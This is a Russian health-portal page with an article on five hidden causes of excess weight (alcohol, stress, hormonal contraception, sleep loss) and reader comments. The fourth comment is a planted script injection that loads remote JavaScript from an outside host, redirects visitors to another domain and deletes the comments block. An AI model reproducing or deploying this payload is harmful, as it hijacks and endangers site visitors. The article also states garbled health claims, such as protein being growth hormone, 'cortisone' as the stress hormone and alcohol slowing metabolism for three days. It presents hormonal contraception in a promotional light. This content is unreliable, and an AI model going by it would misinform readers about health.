Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  5 скрытых причин лишнего ...  >>  5 скрытых причин лишнего веса
 
Обратная связь
 

5 скрытых причин лишнего веса

Размер шрифта
18 июня 2012 10:27
  • google_analytics: false
  • Нравится

Кроме переедания и малоподвижного образа жизни есть еще несколько причин, которые не дают вам держать себя в форме. Что это за причины?

Алкоголь

  1. Алкоголь очень калориен. Все его калории сразу идут в переработку, при этом усвоение остальных продуктов замедляется.

  2. Алкоголь стимулирует аппетит. После него особенно тянет на жирное и соленое.

  3. Спирт растормаживает психику. После пары коктейлей вы легко забываете о чувстве меры.

  4. В алкоголе отсутствуют питательные вещества, важные для здорового обмена веществ. Любой алкоголь – это яд для организма. На время, пока яд выводится из организма, замедляются обменные и восстановительные процессы. Две порции алкоголя замедляют метаболизм минимум на 3 дня.

Отказ от алкоголя и сигареты

Вредные привычки – это способ решать задачи: снять стресс, нервозность, расслабиться или, наоборот, взбодриться. Чтобы отказаться от вредных привычек без вреда для здоровья и фигуры, необходимо подобрать другие способы решения этих проблем. В противном случае стресс никуда не денется, а способов разрядиться не будет.

Стресс

«Заесть» стресс – для большинства единственный простой, доступный и известный способ справиться с неприятностями. Приглушая тревожные ощущения едой, никто не задумывается, что последующий набор веса еще одно серьезное испытание для психического и физического здоровья.

В то же время справиться с кризисной ситуацией помогут навыки эмоциональной саморегуляции и другие, более конструктивные, способы расслабления, к примеру:

  • физическая нагрузка;
  • ароматическая ванна;
  • прогулки;
  • танцы;
  • пение;
  • дыхательные упражнения;
  • вязание.

Гормональный дисбаланс

Еще один враг хорошей фигуры и настроения – гормональные средства предохранения. Их прием негативно влияет на обмен веществ и расстраивает аппетит. Резкие изменения гормонального уровня провоцируют перепады настроения и могут стать причиной депрессии у женщин, которые и без того страдают всплесками гормонов до и во время каждой менструации и в течение беременности.

Комбинированным контрацептивам уже есть современная альтернатива: внутриматочная гормональная система, которая вводит гормоны прямо в полость матки. Доза гормонов при таком точечном попадании в 7,5 раз меньше, чем в современных противозачаточных таблетках на каждый день.

Недосып

  1. Недостаток сна нарушает обмен веществ и способность организма расщеплять углеводы. Во сне совершаются важнейшие процессы по переработке пищи в энергию. При недосыпе организм не успевает «навести порядок» и запасает неиспользованные ресурсы «на будущее».

  2. Недосып стимулирует выработку гормона стресса, кортизона, который, в свою очередь, стимулирует чувство голода.

  3. Недосып снижает уровень протеина (гормон роста), который помогает телу регулировать пропорции жира и мускулов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 августа 2012 в 14:25

Комментарий удален за нарушение Правил общения

2 - Гость

23 апреля 2013 в 20:17

Цитировать   |   Пожаловаться

Протеин - это гормон роста? Нда.... насмешил автор статьи

Гость 23 апреля 2013 в 20:17
Протеин - это гормон роста? Нда.... насмешил автор статьи
 Гормон роста имеет белковую структуру. Статья переводная. Все белки - это протеины. В оригинале было что-то вроде "...специальный белок - гормон роста"

4 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Аппаратная косметология: прицельно убираем лишний объем   Как похудеть, поедая шоколад   Как добавить 20 лет к жизни   Как меняется аппетит с возрастом  
23 августа 2011Женщины толстеют после свадьбы, мужчины – после развода 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Неожиданные причины лишнего веса
Весы OMRON HN289
Монитор состава тела OMRON BF508

Тесты

1
Хорошо ли Вы спите?
Какое мороженное съесть, чтобы похудеть
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.